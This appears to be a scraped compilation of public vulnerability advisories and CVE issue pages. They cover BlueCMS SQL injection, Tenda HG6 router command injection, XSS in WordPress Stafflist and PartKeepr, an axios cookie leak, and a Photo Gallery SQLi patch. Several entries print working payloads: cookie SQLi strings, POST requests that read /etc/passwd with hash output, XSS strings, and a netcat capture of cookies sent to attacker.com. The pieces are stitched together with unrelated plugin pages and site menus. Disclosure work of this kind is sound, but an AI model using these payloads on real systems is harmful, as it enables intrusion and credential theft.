Bluecms 1.6 has a SQL injection vulnerability at cooike.

**Bluecms\_v1.6\_sqlinj****Find by rerce****Bluecms\_v1.6 download page :**

http://lp.downcode.com/j\_14/j\_14745\_bluecms.rar

**vulnerability code:**

include/common.inc.php line 115:  
  
For the $user\_name parameter above，just passed in the addslashes function  
  
Moreover, it can be seen from the configuration file that GB2312 encoding is adopted, so wide byte injection can be considered to bypass addslashes.  
  
When we enter Cookie: BLUE\[user\_name\]=admin%df'.We can see the MySQL error  
  
payload: Cookie: BLUE\[user\_name\]=admin%df' or sleep(5)#  
  
Successful delay 5s.

**Bluecms\_v1.6\_sqlinj\_2**

The same problem appears on line 110  
  
follow  
  
Same as the previous problem.the $user\_name parameter above，just passed in the addslashes function  
payload：Cookie: BLUE\[user\_id\]=1;BLUE\[user\_name\]=admin%df' or sleep(5)#;BLUE\[user\_pwd\]=aaa  
  
Successful delay 5s.

CVE-2022-27962: Bluecms v1.6 has an SQL injection vulnerability at cooike · Issue #1 · xunyang1/my-vulnerability

Tenda HG6 version 3.3.0 suffers from a remote command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands through the pingAddr and traceAddr HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

  
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Vendor: Tenda Technology Co.,Ltd.  
Product web page: https://www.tendacn.com  
                  https://www.tendacn.com/product/HG6.html  
Affected version: Firmware version: 3.3.0-210926  
                  Software version: v1.1.0  
                  Hardware Version: v1.0  
                  Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network  
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),  
a voice port to meet users' requirements for enjoying the Internet,  
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection  
vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters  
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2022-5706  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php

22.04.2022

--

ping.asp:  
---------

POST /boaform/formPing HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---  
TZ  
app.gwdt  
bftpd.conf  
buildtime  
check_version.txt  
config  
config.csv  
config_default.xml  
config_default_hs.xml  
dhclient-script  
dnsmasq.conf  
ethertypes  
factory_default.xml  
ftpdpassword  
group  
hardversion  
inetd.conf  
init.d  
inittab  
innversion  
insdrv.sh  
irf  
mdev.conf  
omci_custom_opt.conf  
omci_ignore_mib_tbl.conf  
omci_ignore_mib_tbl_10g.conf  
omci_mib.cfg  
orf  
passwd  
ppp  
profile  
protocols  
radvd.conf  
ramfs.img  
rc_boot_dsp  
rc_voip  
release_date  
resolv.conf  
rtk_tr142.sh  
run_customized_sdk.sh  
runoam.sh  
runomci.sh  
runsdk.sh  
samba  
scripts  
services  
setprmt_reject  
shells  
simplecfgservice.xml  
smb.conf  
softversion  
solar.conf  
solar.conf.in  
ssl_cert.pem  
ssl_key.pem  
version  
wscd.conf

ping6.asp:  
----------

POST /boaform/formPing6 HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---  
boa.conf  
web

tracert.asp:  
------------

POST /boaform/formTracert HTTP/1.1  
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---  
/home/httpd

tracert6.asp:  
-------------

POST /boaform/formTracert6 HTTP/1.1  
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh  
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh  
nobody:x:0:0::/tmp:/dev/null  
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

Tenda HG6 3.3.0 Remote Command Injection

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

WordPress Stafflist 3.1.2 Cross Site Scripting

A stored cross-site scripting (XSS) vulnerability in Pixelimity 1.0 allows attackers to execute arbitrary web scripts or HTML via the Title field in admin/pages.php?action=add_new

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-28589: Cross-Site Scripting (XSS) in "admin/pages.php?action=add_new" · Issue #23 · pixelimity/pixelimity

A Remote Code Execution (RCE) vulnerability exists in Pixelimity 1.0 via admin/admin-ajax.php?action=install_theme.

CVE-2022-28590: A Remote Code Execution (RCE) vulnerability exists in pixelimity via admin/admin-ajax.php?action=install_theme. · Issue #24 · pixelimity/pixelimity

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter.

**Description**

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter

**Reproduction Steps**

Browsing to Edit tab, select project and add new project.  
There, insert the following payload <img src=x onerror=alert(1)> in name field.

The request performed is the following, being name the vulnerable parameter :

    POST /api/projects HTTP/1.1
    Host: partkeepr.vuln
    Cookie: PHPSESSID=fju4llfcogfr2q9ug1bl982117
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 303
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    {"name":"<img src=x onerror=alert(1)>","description":"","projectPartKeeprProjectBundleEntityProjectAttachments":[],"attachments":[],"projectPartKeeprProjectBundleEntityProjectParts":[],"parts":[],"projectPartKeeprProjectBundleEntityProjectRuns":[],"projectPartKeeprProjectBundleEntityReportProjects":[]}
    

Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers

Apart from **projects** , the following tabs are also vulnerable : **footprints**,**manufacturers**,**storage locations**, **distributors**, **part measurement units** , **units** and **batch jobs**

**System Information**

*   PartKeepr Version: 1.4.0
*   Operating System: LInux
*   Web Server: Apache
*   PHP Version: 7.4
*   Database and version: Mysql
*   Reproducible on the demo system: Yes

CVE-2021-39390: Stored XSS in PartKeepr · Issue #1237 · partkeepr/PartKeepr

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository axios/axios prior to 0.26.

**BUG**

Cookie header leaked to third party site and it allow to hijack victim account

**SUMMURY**

When fetching a remote url with Cookie if it get Location response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.  
Ex: you try to fetch example.com with cookie and if it get redirect url to attacker.com then it fetch that redirect url with provided cookie .  
So, Cookie of example.com is leaked to attacker.com .  
Cookie is standard way to authentication into webapp and you should not leak to other site .  
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com to attacker.com .

**FLOW**

if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .

First setup a webserver and a netcat listner

**http://mysite.com/redirect.php?url=http://attacker.com:8182/**

    //redirect.php
    <?php
    $url=$_GET["url"];
    header("Location: $url");
    
    /* Make sure that code below does not get executed when we redirect. */
    exit;
    ?>
    

**netcat listner in http://attacker.com**

nc -lnvp 8182

**STEP TO RERPODUCE**

run bellow axios code

    const axios = require('axios');
    
    // Make a request for a user with a given ID
    axios.get('http://mysite.com/redirect.php?url=http://attacker.com:8182/yy',{headers:{"Cookie":"dfdd=df"}})
      .then(function (response) {
        // handle success
        console.log(response);
      })
      .catch(function (error) {
        // handle error
        console.log(error);
      })
      .then(function () {
        // always executed
      });
    
    

response received in attacker netcat

    Connection from 127.0.0.1 36724 received!
    GET /yy HTTP/1.1
    Accept: application/json, text/plain, */*
    Cookie: dfdd=df
    User-Agent: axios/0.24.0
    Host: localhost:8182
    Connection: close
    
    

So, here i provided cookie for mysite.com but due to redirect it leaks to thirdparty site attacker.com

**SUGGESTED FIX**

If provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.

CVE-2022-1214: Exposure of Sensitive Information to an Unauthorized Actor in axios

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in MyThemeShop WP Subscribe plugin <= 1.2.12 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

If you aren’t building an email list, you’re missing out on the most powerful and consistent way to drive repeat visitors and customers to your website or blog. With an email list, you become less and less dependent on external sources of traffic, and gain more ability to interact with your blog’s audience.

We at MyThemeShop understand your need, and have developed a unique, cleanly coded, premium subscription plugin. We are now distributing it for FREE to give back to the WordPress community. We have been given so much by the WordPress community, it’s time to give back.

**WP Subscribe** is the only plugin you need to get the perfect subscription forms on your website. With optimized code, it loads before you can even blink your eye. If you’re a website owner, you can make a lot more money than regular blogs, which is why so many marketers focus on creating email lists. With the WP Subscribe plugin, you can do it in a simple yet effective way. Install the plugin, configure the widget and convert visitors into loyal email subscribers.

**Live demos:**

See the WP Subscribe Plugin in action on our demo page: http://demo.mythemeshop.com/sociallyviral/

**Why choose WP Subscribe from MyThemeShop:**

*   It’s the only free all-in-one plugin which offers Aweber, Mailchimp and FeedBurner.
*   Choose between Mailchimp, Aweber or FeedBurner.
*   Options to change text showing in subscription box.
*   Fully responsive.
*   Can be easily customized using custom CSS.
*   Can be used more than once in different sidebars.
*   Super lightweight.
*   Compatible with caching and SEO plugins.
*   Eye-catching design.
*   Position it anywhere where a widget is configured in your theme.

**Support**

All support for this plugin is provided through our forums. If you have not registered yet, you can do so here for **FREE**  
https://mythemeshop.com/#signup

If after checking our Free WordPress video tutorials here:  
https://mythemeshop.com/wordpress-101/  
&  
https://community.mythemeshop.com/tutorials/category/2-free-video-tutorials/

you are still stuck, please feel free to open a new thread, and a member of our support team will be happy to help.

Support link:  
https://community.mythemeshop.com/forum/11-free-plugin-support/

**Help to make it better**

MyThemeShop is a premium WordPress theme provider, and we develop premium plugins in our free time and distribute them for free to give back to the community. Though we take a lot of care while developing anything, we might have missed something useful or important. Please help us make it better by submitting your bug/suggestions/feedback on GitHub.

GitHub link: https://github.com/MyThemeShop/WP-Subscribe/

**Feedback**

If you like this plugin, then please leave us a good rating and review.  
Consider following us on Google+, Twitter, and Facebook

This section describes how to install the plugin and get it working.

1.  Upload the wp-subscribe folder to the to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  You can see **WP Subscribe** widget in widgets section.
4.  Add it in sidebar and footer and configure as you want.
5.  Enjoy!

**Plugin is not working**

Please disable all plugins and check if plugin is working properly. Then you can enable all plugins one by one to find out which plugin is conflicting with WP Subscribe.

Plugin doesnt work anymore on the newest versions of Wordpress. It's a pity, it was a great plugin!

Simple and works, thanks.

Support 0, the plugin removal working only direct na manual from wp folder !

Plugin works great, and the support team is AWESOME! They helped me customize the plugin for two of my websites.

It needs ID from feedburner, mailchip, aweber. If you don't use them, it wont work. Ability to use my hosting service wiill be good. Bacause my website gets very few hits. I cannot afford to use others services. It is better if the plugin is self contained rather than depending on others to deliver emails.

Read all 25 reviews

“WP Subscribe” is open source software. The following people have contributed to this plugin.

Contributors

*    MyThemeShop

**1.2.12**

*   Improved form accessibility

**1.2.11**

*   Added validation for name and email fields

**1.2.10**

*   Changed admin notices

**1.2.9**

*   Updated admin notices

**1.2.8**

*   Added consent field

**1.2.7**

*   Fixed SVN issue

**1.2.6**

*   Fixed PHP notices

**1.2.5**

*   Fixed aweber list issue

**1.2.4**

*   Fixed aweber issues

**1.2.3**

*   Fixed some CSS issues

**1.2.2**

*   Fixed some javascript issues
*   Fixed some credentials in Aweber
*   Improve Mailchimp class
*   Remove notices and warnings on some places
*   Change the behavior of saving mailing service lists

**1.2.1**

*   Provided backward compatibility for CSS
*   Provided backward compatibility for Scoped CSS
*   Remove magnific popup classes from inline form
*   Add loader when submitting form
*   Fixed inline form responsiveness
*   Minify the CSS File

**1.2.0**

*   Whole plugin is re-written in OOP
*   Huge performance Improvements
*   Moved JS and CSS folders inside assets folder
*   Enhanced: Functions are more organized in wps-helpers and wps-functions-options file.
*   Fixed: Missing and in-correct textdomain

**1.1.4**

*   Changed AWeber form URL to HTTPS

**1.1.3**

*   Added option to enable name field
*   Added MyThemeShop tab in “Add Plugins” page

**1.1.2**

*   Removed nonce from frontend

**1.1.0**

*   Replaced Feedburner HTTP link with HTTPS

**1.0.9**

*   Fixed spelling mistake in Pro Notification

**1.0.8**

*   Fixed translation and text domain issue

**1.0.7**

*   Fixed notification closing issue

**1.0.6**

*   Switched to PHP 5 style constructor method for the widget class

**1.0.5**

*   Improvement – input placeholder text hides on click.

**1.0.4**

*   Fixed AWeber signup issue

**1.0.3**

*   Fixed add\_query\_arg vulnerability

**1.0.2**

*   Added double opt-in possibility for Mailchimp

**1.0.1**

*   Fixed Title field saving issue in newly added widget
*   Fixed compatibility with other plugins using Mailchimp API

**1.0**

*   Official plugin release.

CVE-2021-36844: WP Subscribe

The Photo Gallery WordPress plugin through 1.6.3 does not properly escape the $_POST['filter_tag'] parameter, which is appended to an SQL query, making SQL Injection attacks possible.

File:

  

*   photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php**
    
    r2587758
    
    r2706797
    
     
    
    43
    
    43
    
          $bwg\_filter\_tag\_temp = WDWLibrary::get('filter\_tag\_' . $bwg, 0);
    
    44
    
    44
    
          if ( !empty($bwg\_filter\_tag\_temp) ) {
    
    45
    
     
    
            $filter\_tags = explode(",", $bwg\_filter\_tag\_temp);
    
     
    
    45
    
            $filter\_tags = array\_map('intval', explode(",", $bwg\_filter\_tag\_temp));
    
    46
    
    46
    
          }
    
    47
    
    47
    
        }
    
    48
    
    48
    
        else {
    
    49
    
     
    
          $filter\_tags = explode(",", $bwg\_filter\_tag\_temp);
    
     
    
    49
    
          $filter\_tags = array\_map('intval', explode(",", $bwg\_filter\_tag\_temp));
    
    50
    
    50
    
        }
    
    51
    
    51
    
    …
    
    …
    
     
    
    111
    
    111
    
              $join .= ' LEFT JOIN (SELECT GROUP\_CONCAT(tag\_id order by tag\_id SEPARATOR ",") AS tags\_combined, image\_id FROM  ' . $wpdb->prefix . 'bwg\_image\_tag GROUP BY image\_id) AS tags ON image.id=tags.image\_id';
    
    112
    
    112
    
          }
    
    113
    
     
    
          $where .= ' AND CONCAT(",", tags.tags\_combined, ",") REGEXP ",(' . implode($compare\_sign, $filter\_tags) . ')," ';
    
     
    
    113
    
          $where .= ' AND CONCAT(",", tags.tags\_combined, ",") REGEXP ",( %s )," ';
    
     
    
    114
    
          $prepareArgs\[\] = implode($compare\_sign, $filter\_tags);
    
    114
    
    115
    
        }
    
    115
    
    116
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-1281: Diff [2587758:2706797] for photo-gallery/trunk/frontend/models/BWGModelGalleryBox.php – WordPress Plugin Repository

The Import WP WordPress plugin before 2.4.6 does not validate the imported file in some cases, allowing high privilege users such as admin to upload arbitrary files (such as PHP), leading to RCE

Tag

#php